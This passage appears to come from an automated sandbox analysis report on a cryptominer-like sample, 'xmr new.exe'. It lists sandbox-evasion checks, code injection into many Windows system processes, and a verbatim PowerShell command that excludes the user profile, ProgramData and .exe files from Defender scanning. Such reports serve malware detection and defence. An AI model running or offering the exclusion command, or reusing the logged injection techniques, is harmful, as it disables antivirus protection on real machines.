        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5260
        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8489
        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1509
        Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9949
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5636
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4022
        Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9876
        Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 1808
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Dropped PE file which has not been started: C:\Windows\Temp\zhgmaxoaawxc.sys
        Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_37-14709
        Source: C:\Windows\System32\dwm.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_42-14805
        Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_40-14770
        Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_31-22064
        Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_25-480
        Source: C:\Windows\System32\lsass.exe API coverage: 7.4 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.3 %
        Source: C:\Windows\System32\dialer.exe API coverage: 0.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.2 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200 Thread sleep count: 4599 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248 Thread sleep count: 5260 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764 Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 616 Thread sleep count: 8489 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 616 Thread sleep time: -8489000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 616 Thread sleep count: 1509 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 616 Thread sleep time: -1509000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 3616 Thread sleep count: 9949 > 30
        Source: C:\Windows\System32\lsass.exe TID: 3616 Thread sleep time: -9949000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340 Thread sleep count: 5636 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608 Thread sleep count: 4022 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444 Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1592 Thread sleep count: 249 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1592 Thread sleep time: -249000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 5228 Thread sleep count: 9876 > 30
        Source: C:\Windows\System32\dwm.exe TID: 5228 Thread sleep time: -9876000s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 4108 Thread sleep count: 1808 > 30
        Source: C:\Windows\System32\dialer.exe TID: 4108 Thread sleep time: -180800s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7084 Thread sleep count: 250 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7084 Thread sleep time: -250000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 432 Thread sleep count: 255 > 30
        Source: C:\Windows\System32\svchost.exe TID: 432 Thread sleep time: -255000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5956 Thread sleep count: 256 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5956 Thread sleep time: -256000s >= -30000s
        Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
        Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BCDCE0 FindFirstFileExW, 31_2_000001F385BCDCE0
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A29199DCE0 FindFirstFileExW, 37_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EDDCE0 FindFirstFileExW, 40_2_0000014E25EDDCE0
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F5DCE0 FindFirstFileExW, 42_2_00000283E0F5DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539CDCE0 FindFirstFileExW, 67_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BDDCE0 FindFirstFileExW, 68_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD16DCE0 FindFirstFileExW, 69_2_000001F2BD16DCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
        Source: dwm.exe, 0000002A.00000000.1550186667.00000283DDE43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
        Source: svchost.exe, 00000028.00000000.1540966403.0000014E2522A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000P
        Source: dwm.exe, 0000002A.00000000.1550186667.00000283DDE43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: lsass.exe, 00000025.00000000.1535258971.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2796968061.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1540929396.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2795636946.0000014E25213000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: svchost.exe, 00000028.00000000.1540966403.0000014E2522A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_25-413
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_63-477
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_66-91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_000001F385BC7D90
        Source: C:\Windows\System32\dialer.exe Code function: 66_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 66_2_00000001408460F0
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree, 25_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BCD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_000001F385BCD2A4
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A29199D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000002A29199D2A4
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A291997D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000002A291997D90
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_0000014E25EDD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25ED7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_0000014E25ED7D90
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F5D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00000283E0F5D2A4
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F57D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00000283E0F57D90
        Source: C:\Windows\System32\dialer.exe Code function: 65_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 65_2_0000000140001160
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001FB539C7D90
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 67_2_000001FB539CD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CBD8BD7D90
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_000001CBD8BDD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 69_2_000001F2BD167D90
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD16D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001F2BD16D2A4

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 1F385B90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 2A2911C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 14E255D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 283E0EF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 1F385BF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 2A2919C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 14E25F00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 283E0F20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FB53990000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F2BD130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 229F8B70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2938BA00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2258F3D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26F54840000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22B76580000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1265E790000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 18510D30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 200A2B70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F33CBD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FAB73D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D3E96E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2389D0D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22E66FD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A4D6530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20763780000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 200FF1A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23CC6130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 266F1070000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26008BB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 12E54DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2CF20530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19EA6340000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: A50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1EC464E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15B351A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C38C460000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DC09A40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C73F910000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1616A5B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 181C5E90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 18E3AF30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D70B1D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26DA05C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C9B0460000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23A7CF40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 184FCB80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 1CF1CE30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1697C550000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F0FE010000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FC093B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C8004E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 118D8250000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 27687590000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 28FAA0B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: B40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19292570000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 221CFED0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 15DAA130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 14A28E00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19605730000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2DA0CB00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E8A07B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2E321250000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19BE8590000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 230C4CC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 85B9273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: 911C273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 255D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 85BF273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 919C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 25F0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E0F2273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5399273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: D8BA273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: BD13273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F8B7273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8BA0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8F3D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5484273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7658273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5E79273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 10D3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A2B7273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3CBD273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B73D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E96E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9D0D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 66FD273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D653273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6378273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FF1A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C613273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F107273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8BB273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 54DA273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2053273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E9EA273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A634273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A5273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5C5A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 464E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 351A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8C46273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9A4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3F91273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6A5B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C5E9273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3AF3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B1D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A05C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B046273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7CF4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FCB8273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1CE3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7C55273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FE01273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 93B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D825273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8759273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AA0B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9257273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1FCE273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CFED273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 73B6273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6E7A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AA13273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FBD4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 28E0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 573273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7F1C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8C03273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 99B5273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CB6C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CB0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9200273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 55C0273C
